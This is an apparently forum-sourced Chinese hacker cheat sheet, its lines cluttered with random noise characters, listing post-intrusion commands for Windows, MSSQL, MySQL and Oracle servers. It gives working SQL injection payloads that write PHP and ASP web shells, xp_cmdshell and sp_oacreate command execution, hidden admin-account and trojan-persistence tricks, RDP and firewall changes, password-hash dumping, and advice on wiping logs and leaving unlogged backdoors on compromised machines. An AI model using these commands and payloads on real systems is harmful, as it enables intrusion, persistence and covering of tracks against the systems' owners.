+ I) W$ _: d& l0 o
1.net user administrator /passwordreq:no
+ q+ Y3 u, X( K+ |' C这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了! Q/ S# w0 Y& w- c1 {
2.比较巧妙的建克隆号的步骤
2 v3 {4 v1 v6 p+ n. x先建一个user的用户. ], G2 o: N" r6 |( E
然后导出注册表。然后在计算机管理里删掉
! I+ Q8 Q5 L& L# S$ W$ ~在导入,在添加为管理员组- T2 c5 w0 V( \% @ ~
3.查radmin密码: }; Z' F) \" _ b6 N2 f
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg8 `7 ~: _3 A H2 g+ d
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]9 [& d6 S6 H0 `8 u
建立一个"services.exe"的项
# a8 L( G8 @/ X, |4 G, h% x再在其下面建立(字符串值)
' v- _. K" h# h# @键值为mu ma的全路径
" \. O3 @# o- z1 I6 ^5.runas /user:guest cmd
1 ?% _6 h6 p6 }% T; [+ J2 @6 \7 i, V9 P测试用户权限!8 O+ c3 \5 x' @, x% M' ^2 h# w
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
1 d7 v2 |- u4 N+ J- z7.入侵后漏洞修补、痕迹清理,后门置放:8 _1 H' C+ N; g+ y @5 }- f8 P' _+ R
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
6 A9 U5 N0 H. e% S3 u$ V7 n. R* p8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
* L) Q9 Q0 ]7 R% p# C2 e/ ^$ ?9 Z/ y& n- l ^3 [0 h' V
for example
* ?$ j- b# A6 q2 |4 m9 u$ q* ` a5 ^, u. `: V2 c" Y' C$ j: d" z$ Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'* q3 f% Q" N# I, y
& E! h2 ]. A6 t4 s$ sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add') x3 U3 C3 C1 H$ J
3 d* Q2 c4 |/ ?2 O5 l3 W* X8 r1 U9:MSSQL SERVER 2005默认把xpcmdshell 给ON了" Q7 t D5 {3 e9 _2 b$ V! l# ?1 p
如果要启用的话就必须把他加到高级用户模式
+ \5 }* I) o, T/ G* d/ a7 U可以直接在注入点那里直接注入
; t t% Z* D$ ~# O- |" h* [3 k+ k7 pid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--! n1 h, U" T- ~
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--7 x% f# Q/ d. O# g8 O9 \1 ^
或者
5 s* ?1 j: f/ `3 ?sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% a& S. O7 D6 t% k9 n
来恢复cmdshell。
/ |8 l7 G' h; S3 i5 w' R
8 O% u5 ]! ?$ n5 g* W# ]分析器5 S- y- H0 u- }4 J$ K
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--, Z; v9 K) {$ z4 B
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")4 \$ Y' c, w8 A! P
10.xp_cmdshell新的恢复办法. M* h0 q, F/ D7 I8 a
xp_cmdshell新的恢复办法" m& }* X+ y3 p4 n& V W/ `( }' E
扩展储存过程被删除以后可以有很简单的办法恢复:4 M, ]8 v6 N( q! V, L' E+ R1 @) N4 X
删除
$ I* r- ^: h7 x( g7 \3 j* Kdrop procedure sp_addextendedproc
0 U4 _* S& ?+ C( vdrop procedure sp_oacreate$ Z/ U$ U- _ F9 }% f1 W; {
exec sp_dropextendedproc 'xp_cmdshell'
5 |* M" i$ J' a, a- r
% m4 i( B g9 M" b) b: _恢复+ y' M. o R1 U! T) P! e+ T& y
dbcc addextendedproc ("sp_oacreate","odsole70.dll"), A, g$ Z) v3 u
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
s B# d6 a% B+ e: r- k/ q$ q+ N+ G7 r
这样可以直接恢复,不用去管sp_addextendedproc是不是存在! {) H! I9 R! ~! D; J
# w- a. g7 n B& D-----------------------------: M# U! m: o# y; H) v. C- r2 h
4 G' I }" P) f" X% G
删除扩展存储过过程xp_cmdshell的语句:
$ P; l9 \4 C0 \exec sp_dropextendedproc 'xp_cmdshell' Q; @$ ~$ ~% [4 Z& A
, i* @3 o# ^, y; ^* n& m9 c恢复cmdshell的sql语句
8 k9 Q4 z5 [* p' j) f4 K9 Qexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
% d- T9 T3 s4 o$ x
6 N# Z$ M6 |4 p% r. \. X( X+ O5 I4 C# @; U, Y0 W% B, j3 w" h
开启cmdshell的sql语句
Y9 ^. p1 q6 @- N4 o+ c4 W5 }( z1 ~% O+ O5 C ]3 E4 {
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
, V/ B" a% u; _6 ? j
7 C) B9 q: U( ~9 a: \0 \2 O判断存储扩展是否存在1 Y C! H& j4 X# {
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
' Y' u! k3 T6 S3 s+ i+ z返回结果为1就ok
1 a) G' l) O6 x% t6 o
% c! [9 V4 q; |/ D: n恢复xp_cmdshell
! S0 C* D7 d. [- B& d6 o) Oexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'/ I9 J3 b5 T7 U. R) T! N- ?
返回结果为1就ok. e5 B' J) G5 [( P |
1 \" g4 g+ I# W" l4 V0 B; R% H# F4 |$ _否则上传xplog7.0.dll
) K9 I/ ]+ R1 Gexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
0 K0 l) k7 U" W
7 [% J" e# x6 S' F' L堵上cmdshell的sql语句
' T" K* B& X* l2 Z. F+ b# t) X7 m. bsp_dropextendedproc "xp_cmdshel
' z/ e( Q0 O/ _. V* D2 q-------------------------
1 m0 e# G5 h* p清除3389的登录记录用一条系统自带的命令:
' o, \, t) G9 Vreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
( E% J- P4 e- o" j9 A& J& Q
# ]% ?. L% ]! A8 ]: v2 S然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
5 S' k# d* u" r% U9 y; A( v7 u! F在 mysql里查看当前用户的权限. B: J) [! _" l$ g0 S' X
show grants for
2 |: |0 k4 a2 X- ?+ b3 e& a
- `# F# z$ Q5 E% { _/ L t% Q以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
3 w" q3 A" M ]' x4 `9 x% a4 N
- l- e( z& ~" U( u, L: x5 W! H
) r7 Z* b2 S1 S" I8 |3 Z t9 HCreate USER 'itpro'@'%' IDENTIFIED BY '123';- A0 e! e% v2 o$ A2 \# c+ b2 V
( ?, b% V" O6 w+ B! u$ ?! jGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION2 g, v' l0 Z4 T* T
9 w6 {" D0 k o, r
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 08 i P' ~# |1 i5 n5 q+ k
. y7 _- X7 o7 L- C: E j2 i2 I
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;+ ? s" K+ K6 \% n
; a q3 S4 D9 d2 m
搞完事记得删除脚印哟。
5 h1 }3 \' v( b6 ^! B% m @- i6 B* U3 l) p
Drop USER 'itpro'@'%';0 L/ u# T* y8 T
. f1 ^! ~; ]( g3 e: W7 }
Drop DATABASE IF EXISTS `itpro` ;; _( ? {7 `: ^ ]
, _8 k% B& d# ^4 n
当前用户获取system权限0 e0 F9 l. t6 G
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
X0 J1 g: M6 x7 r3 osc start SuperCMD
3 f" g+ i+ c& p: V& U8 v6 B6 j程序代码' a {* s4 @. D j, x
<SCRIPT LANGUAGE="VBScript">
; S# {1 r* E: p$ }2 c" mset wsnetwork=CreateObject("WSCRIPT.NETWORK")6 ]! h, ^. e( H; k; ^. c
os="WinNT://"&wsnetwork.ComputerName7 Y2 T9 c+ c& |) R. S& O7 Y. U
Set ob=GetObject(os)- [4 K' }" x9 [3 {! h! r
Set oe=GetObject(os&"/Administrators,group")" p. Y6 e! t& i/ W$ C8 O
Set od=ob.Create("user","nosec")
" _; n8 p7 k& w& ]- [' Aod.SetPassword "123456abc!@#"& M7 |5 y% U# t; n; k* a
od.SetInfo6 a2 b# j0 G, k
Set of=GetObject(os&"/nosec",user)
' \6 [; | N- W- N) L; s& Q9 l: \oe.add os&"/nosec"/ I( `2 h, Q! X! e6 [
</Script>
3 c& h0 B3 a; r0 L& h j2 u<script language=javascript>window.close();</script>- C5 `( B2 A6 ?& Z5 z h% F8 D
! h% Y5 f. @4 c; S( G; o1 C
5 U* _$ e, f6 b k$ n" {# u$ {2 a0 q/ ~- v/ S6 N: ?, B
. r6 {$ J* m- ^2 _, w: D6 n突破验证码限制入后台拿shell
" u5 V: P3 u7 K5 L& D程序代码
9 @/ x& E g7 H; K7 T2 kREGEDIT4
+ G: U2 D0 [1 ?, c) v7 r/ z2 I[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
$ R# [2 Y: R9 G1 s2 ?. G5 F1 s. K"BlockXBM"=dword:00000000. Q8 A2 k6 U) x$ b2 t1 v0 H
6 |4 M' D! o% s) H/ r保存为code.reg,导入注册表,重器IE. K b: \6 {* M9 _ E/ \ Q
就可以了" U9 \# y# @& [2 z% C" }
union写马
2 u4 U5 J8 d0 Q- G( h9 k6 Y程序代码
- M, Q8 E. V: s# } S1 d2 O) S( Rwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
( I, h3 \' S* V3 ]8 O. L
; i1 v0 ^2 y% \应用在dedecms注射漏洞上,无后台写马
: k X g5 g' \; L8 o1 T# u9 J+ adedecms后台,无文件管理器,没有outfile权限的时候
5 \9 _ z& A) H2 [9 C. m8 B2 B3 }在插件管理-病毒扫描里
; o- I. t# v9 w' x. N1 h6 p9 d写一句话进include/config_hand.php里3 O* R0 X* u8 H' ~4 P, D
程序代码" k% w8 }0 A4 L9 _
>';?><?php @eval($_POST[cmd]);?>
* E+ A6 y U9 Q: q7 {
6 d; T7 }4 C- H/ V* K8 r7 V
. R& E7 z% ]/ p4 y" H0 @如上格式( e1 u$ G n# r3 @
/ ~. U: ?' ] Y$ |( Joracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
2 w& r* u9 ?! Q1 i: ~程序代码
+ D2 Z8 c; D0 N4 _' jselect username,password from dba_users;! j' Z' C& M& A' _
/ [& }1 H9 Y" H5 X) Y
- e3 U6 i7 Y+ R3 imysql远程连接用户$ `7 g O0 N# ?9 p, r5 A. \* C6 t. e1 C
程序代码
4 f0 [ f; Q3 P! P+ x! z2 _, e. m
3 i% f% p0 F) l2 FCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
. Z! b1 \: j( m/ U- m4 n% F5 uGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
7 J1 v( U% u/ R1 Y# b; mMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
+ d2 ^ L" g/ G" }# GMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
4 e+ Y; F8 G7 C; N( u7 v1 @8 f) q- s' X6 t' o: p
5 P" g- A7 R4 c& I9 B( m! a( }1 M
. B* U3 |% f1 D9 C- V
7 m1 w, q& a( }6 Vecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0" y; d: ^- _$ K( }
7 S% x# [- m6 q/ u7 A1.查询终端端口
. t3 s5 r: q3 D1 q( `
. _7 O N5 m# w* Z# nxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber4 j* k I* _6 z
& t% l s3 _# _; f* e2 I J H5 u# Z% p$ i通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"1 k* ?* U& w2 y- B& @. i2 Y
type tsp.reg2 D& {8 @3 @5 ^! G
+ o1 X. c" O# ?, Y+ v, S8 f3 m2.开启XP&2003终端服务- [5 K% b( m9 a* k( N8 G) X
. s' O+ F/ u0 ]7 W9 | J* G1 w' m/ a
# J3 z$ B, Q1 GREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
1 N8 U/ n. l4 K7 ~" E
/ c- K4 {6 D( P3 u# K2 G4 f* Y3 r0 Q& f6 Y" E
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" g e8 H0 z* `9 e, z! V
8 T2 e, q# z0 f9 o* j! r( U
3.更改终端端口为20008(0x4E28)* I9 r- S: ?3 _: V
! Q4 @3 z8 f$ r, E6 M9 \REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f% `, s* D W" k% Q. `
0 `0 u! w( ]2 F3 i9 }! jREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
1 Y- A$ p) e5 Y0 t; y' a& }6 o' k5 r A6 I' Q
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制5 v. x' Z4 S' V3 [' v0 C
- z- a& q3 M2 R
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
# o) N0 q# c6 }6 v
6 o" B% K. d$ c1 W1 E% Z" r1 X& _; g0 ~& k
5.开启Win2000的终端,端口为3389(需重启)8 B ^, e6 x2 u0 X& j
! D1 i& P4 n) W# U
echo Windows Registry Editor Version 5.00 >2000.reg
: K3 I6 S" E/ U5 x. @% n8 oecho. >>2000.reg
% z0 `, r' v2 u aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
* l) }9 l% q7 ?echo "Enabled"="0" >>2000.reg
( [7 X* N6 |2 D( p6 e. Eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
2 ]& m5 _" h3 f6 J+ Fecho "ShutdownWithoutLogon"="0" >>2000.reg ! D. y6 j. q8 j& o* S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg , D) _2 ~2 ]# J' N
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
2 F$ t+ }, @# b. O. ?2 g: {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 0 x# C$ J1 L& ?
echo "TSEnabled"=dword:00000001 >>2000.reg ' |7 H6 s0 |" k# m' x X& P; W y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ! X, I( f) p; a& y+ A9 J
echo "Start"=dword:00000002 >>2000.reg 3 o, {) R3 _6 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 8 {* M- o1 g4 Y' J* b1 l: ^8 n
echo "Start"=dword:00000002 >>2000.reg
; y. o! s4 o, S2 ~ r& \5 ~: Necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
8 z: Y. s# Q j3 z9 z$ mecho "Hotkey"="1" >>2000.reg ; H* K; B4 z9 p8 z! q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg / F; ~! ~4 y. E5 [. j; h
echo "ortNumber"=dword:00000D3D >>2000.reg
8 g+ X$ |. p' h6 l+ X8 X. zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
8 H# s" C+ F' eecho "ortNumber"=dword:00000D3D >>2000.reg
8 Z$ O- r' |) q& q! C
5 C! c) k# \; D5 P6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启). \: w; ^6 k1 J* v9 w& h7 k
& `( }9 J$ W2 r- D* R
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf7 b' G- {6 H! t" C8 L/ a/ @$ A6 B+ d
(set inf=InstallHinfSection DefaultInstall)
% m$ R. a' _# M1 vecho signature=$chicago$ >> restart.inf1 H# O$ |$ j' Y# h) j/ C6 ], B: Y" e4 H
echo [defaultinstall] >> restart.inf% n- E* ]. n% R/ G4 [
rundll32 setupapi,%inf% 1 %temp%\restart.inf
0 X5 T6 S0 k r- Q3 g$ ]
/ Q2 c+ M8 u/ Y
: Q5 e" C5 A- g9 H7.禁用TCP/IP端口筛选 (需重启): e- x% x5 G' g
" k) \- L ~' z8 d% m! r
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f1 c! Z. p( Z: H% W `- j3 V
3 k& f0 H- W, N1 O- m/ s
8.终端超出最大连接数时可用下面的命令来连接
. y- E9 X$ {9 x6 h7 U/ O
+ y# E/ t2 _; f' L& u d9 Pmstsc /v:ip:3389 /console2 h- B& Z* P N6 {: j6 v
7 T+ A8 U- ]% Q9 Y8 b: A
9.调整NTFS分区权限8 x( h/ ?3 T/ U% ~- @3 }9 s* F1 m
( k; \3 o7 [* R! v; X7 R
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)" o8 |) y' M8 ]! a3 |
& U( ~! t9 n" k; b, ^2 Wcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
" F0 y% g7 F, p4 G( t. L% `
! r* g1 m8 S5 Y& h------------------------------------------------------; h& p8 D& L# k6 m/ I
3389.vbs 1 b5 H5 ]9 P& }6 {6 T
On Error Resume Next G: E: H7 Q; L9 b5 c" D( W4 X+ J @0 o
const HKEY_LOCAL_MACHINE = &H80000002
+ U1 L6 M/ O2 cstrComputer = "."! W$ I( h% P2 Q) ~
Set StdOut = WScript.StdOut
* c: p8 S1 C- _! ASet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
3 Z& ? b7 c* J- G/ S; JstrComputer & "\root\default:StdRegProv"), B. y9 ?2 B2 G2 n4 s6 O' U; a
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 W# i' \8 G6 n0 o
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; F V P/ e0 U; C) DstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
P* g7 ?8 L2 g8 b' O6 v) poreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
5 I! |9 [! \7 L4 ?1 P9 J: h# c+ astrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
# s9 X2 B$ l. p N# a- \' _strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 @' R8 f) C( L4 k+ u
strValueName = "fDenyTSConnections". ^! Z4 U# y# z( w' E$ \
dwValue = 0" T1 o6 M8 |( ~0 X3 c5 g. w1 J
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue# o4 f* e% z9 K) ?. B% @) x
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
. [9 k; ~' z) l3 o* xstrValueName = "ortNumber"
' K3 ~# u I3 V& S# M! \dwValue = 3389
# y( ]) E }0 _& n, ^oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
$ S$ [( V A! T! E( `& r' g0 Z+ p( YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"3 m& u% i$ U- u% ?/ ^
strValueName = "ortNumber"
+ C" h' b2 Y" V9 s3 VdwValue = 3389) Y( A) ?2 L |& g. x
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! c* k: S* E/ v7 Z1 ]. {6 N3 I9 JSet R = CreateObject("WScript.Shell")
; @# Y6 @+ B$ u9 yR.run("Shutdown.exe -f -r -t 0") , l' r: J; g& ^, x$ N
, [$ O% ^; J$ d8 d% M5 H$ h
删除awgina.dll的注册表键值
2 q# { b( ?/ V$ U3 g程序代码1 ]. o5 I& O! Q* b. d/ K
2 ?* Z1 `/ _7 c3 {' R% V) v) zreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f$ h( Y: a0 i& T7 S& d1 `
; }/ ^5 @3 D6 n
- |8 F" Q3 Z4 o) T( n
6 B3 Z; M5 g; E
) W/ g4 z- d z% P0 N% V/ Q4 K程序代码+ n/ N- i+ I2 @/ C; G
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
0 F3 b% x9 h3 I2 h2 V& x& P
, v8 F8 f( i$ k {) a5 ~$ U9 }设置为1,关闭LM Hash. q, M7 d4 X- E8 C8 x& y5 R) A; m
$ i, H1 v( A* W8 W0 G: V数据库安全:入侵Oracle数据库常用操作命令$ A1 o( M5 D% U `6 A
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
& a( }( f7 s& x* D3 Q9 A3 }1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。! e4 T4 E# A) y
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;: V- o" q. G( V+ W) o
3、SQL>connect / as sysdba ;(as sysoper)或0 \. S0 D6 C f- x' c0 {; [
connect internal/oracle AS SYSDBA ;(scott/tiger)# {$ E3 W0 p) N. J. A+ z! j! M; ]
conn sys/change_on_install as sysdba;
9 {6 }$ M$ B# p- b/ p# T/ H: b) l4、SQL>startup; 启动数据库实例
. ]2 B" q( f8 {) a2 M5、查看当前的所有数据库: select * from v$database;
( ? A0 u2 S3 t9 N/ oselect name from v$database;
( j; s |$ u8 [2 Z0 i6、desc v$databases; 查看数据库结构字段8 T0 W, a/ v6 {1 ~' u
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:. `: k. }, B4 B' g! X
SQL>select * from V_$PWFILE_USERS;
1 c* W3 n6 i: E6 ]Show user;查看当前数据库连接用户
3 W. Q! l# \7 z5 {( V x: Z/ u8、进入test数据库:database test;3 d5 ~+ ?6 \4 a& k1 o: }4 I6 P
9、查看所有的数据库实例:select * from v$instance;
* {2 e& @0 H$ I1 @' R如:ora9i
7 ^' L5 T1 r6 G* z& g2 P) g; l10、查看当前库的所有数据表:
! \% v. p& M( rSQL> select TABLE_NAME from all_tables;6 q9 ]( ^4 M/ h# v- _) P7 n+ }4 O
select * from all_tables;9 z9 F( r1 D. Z4 \ Y( E
SQL> select table_name from all_tables where table_name like '%u%';3 t) ]2 ]0 o$ h2 ^. e4 C+ F
TABLE_NAME
. g. N% T. Y! V, K }4 `------------------------------
! u1 l u2 D% f* L$ B9 n" i, v' s_default_auditing_options_
3 }. Y5 \5 H! Z: i11、查看表结构:desc all_tables;& M" _6 ?- P4 l; R
12、显示CQI.T_BBS_XUSER的所有字段结构:4 [9 q% ]3 z8 \% I
desc CQI.T_BBS_XUSER;4 @0 h/ P" H& L6 U L) d% w
13、获得CQI.T_BBS_XUSER表中的记录:
' A! K8 @4 ~# b6 ^( {select * from CQI.T_BBS_XUSER;
# w/ L7 h- R# W, M' s14、增加数据库用户:(test11/test)
0 \# v/ @7 {1 W* ecreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
4 `7 \3 n, e( S2 S15、用户授权:
( e ]# }& O0 k8 {: w, O8 D0 cgrant connect,resource,dba to test11;
1 Z- p8 Z) B1 |6 g4 l3 Jgrant sysdba to test11;1 _% w! f1 h5 ^# ]" q
commit;& Y! r+ Z% j' w, c1 n8 h: B3 H
16、更改数据库用户的密码:(将sys与system的密码改为test.), w% ^: k; M9 R4 a9 V1 c ?
alter user sys indentified by test;
e& k% I. f5 e2 Palter user system indentified by test;
. f) i- E; W/ a) s, u* H1 j( Y1 [- j; E5 K+ E
applicationContext-util.xml
3 y! l1 ]$ Z. ]& K" VapplicationContext.xml, O$ P6 b4 n! V
struts-config.xml3 v* `$ K) G, [" g8 `
web.xml# W, B6 ]/ J9 ?
server.xml6 C) b6 o6 t" `8 l4 C
tomcat-users.xml
. ?' \( Z4 d' }2 Ohibernate.cfg.xml
) A4 q! z9 A6 b+ B2 M3 tdatabase_pool_config.xml: P* x# C* I$ B" g+ B
* K7 W$ w+ F) k$ g
) I- i1 g! v/ h" U0 V& \+ m s
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
9 P, J3 E o" L* R/ M\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
4 E) B! d4 O5 z: W# H; B/ i\WEB-INF\struts-config.xml 文件目录结构
6 I" d9 \ T# V' ^
: K& W* `' @- ^/ ^5 V/ M' ?spring.properties 里边包含hibernate.cfg.xml的名称
z7 G; G# _; i7 k1 |) K
* `5 M& u. W9 c& b K7 b, j# R) n5 @& G9 i' a/ `3 f/ t" _
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
0 G) R5 U0 S& G; V, k, t9 G5 u, z2 J+ ^" |/ ?& c, O# I
如果都找不到 那就看看class文件吧。。
4 G, M: g; }+ W* e v% |
9 d2 H% V* F- a9 @0 ]9 ?5 l测试1:5 o# s3 @: S: B$ z# b
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1( E$ a+ n. w4 P- Q2 Z0 R6 w
! V, A i, G( y9 S. ^9 D& {* [; K7 \$ r8 a测试2:) L' E. V6 V/ r6 Y& O4 e
( y' X" ~4 Y2 Z/ ~create table dirs(paths varchar(100),paths1 varchar(100), id int)$ D3 w" Z. \$ Y( b" U+ h
: `6 y* d" |; P' ^delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--. r1 D) m7 ~, R
$ O; J" L G# J$ @SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t17 f9 K0 l3 @4 ?' s. O
, R7 w/ s) \7 \) D' I4 M9 z
查看虚拟机中的共享文件:1 } s8 y8 c6 P1 u+ H# \
在虚拟机中的cmd中执行7 L( |' J8 D( m" C' j
\\.host\Shared Folders
4 q' ~1 z- i @5 `+ Q$ U
" F8 l3 v# O' d+ d, Ycmdshell下找终端的技巧- s. Y8 m+ e! M3 n; ]
找终端:
0 a: ]. R0 V4 R8 y4 h% P第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 7 Q7 V! Z) X \( I, B. x: ~
而终端所对应的服务名为:TermService
3 ?) Z9 U4 a+ S( f- ]; J2 ^第二步:用netstat -ano命令,列出所有端口对应的PID值!
0 k! i8 k! A" \( l2 R 找到PID值所对应的端口
8 T+ `4 y1 j6 p: n+ V# @! ~2 x
- Y. v7 v. m, @4 ^ I% e# M2 C查询sql server 2005中的密码hash+ F1 Y# o9 ~: j; ~# F+ Q- m7 U
SELECT password_hash FROM sys.sql_logins where name='sa'
# s1 C% h% X# MSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a" C- [5 K! W6 f4 ~
access中导出shell
